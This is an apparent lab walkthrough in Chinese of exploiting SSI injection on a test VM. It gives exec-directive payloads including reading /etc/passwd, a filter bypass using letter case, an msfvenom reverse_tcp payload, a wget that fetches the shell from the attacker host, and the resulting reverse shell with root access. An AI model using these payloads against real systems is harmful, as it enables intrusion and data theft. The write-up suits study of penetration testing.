主機:192.168.32.152
靶機:192.168.32.161
ssI是賦予html靜態頁面的動態效果,通過ssi執行命令,返回對應的結果,若在網站目錄中發現了.stm .shtm .shtml等,且對應SSL輸入沒有過濾
該網站可能存在SSI注入漏洞
ssi注入就是尋找輸入點輸入類似<!--#exec cmd="命令" --> 格式,看看能不能運行系統命令。
如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" -->
切換目錄<!--#exec cmd="cd /root/dir/" -->
nmap,nikto 分析,發現可能存在SSI注入,
dirb 看看目錄
index目錄下,有個SSi語句
SSI目錄下看到應該是和命令注入有關
通過robots.txt目錄挖掘到站點的根目錄
打開網頁找一個注入點,測試后,在這里找到,發現有過濾,大小寫可繞過,網頁給出的測試命名少了個!符號,加上測試成功
此時我們就可以嘗試生成一個python shell 上傳到網站服務器根目錄上,再執行反彈監聽
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
在打開msfconsole監聽
此時再將生成的pyshell上傳至web根目錄(/var/www/html),再打開apache服務器
在開啟apache服務器,查看狀態
再將pyshell下載到站點上<!--#exec cmd="wget http://192.168.32.152/pyshell.py"-->
再提權
<!--#exec cmd="chmod 777 pyshell.py" -->
然后啟動python pyshell.py,成功反彈shell!
隨后,進入shell,優化終端,可以進入root目錄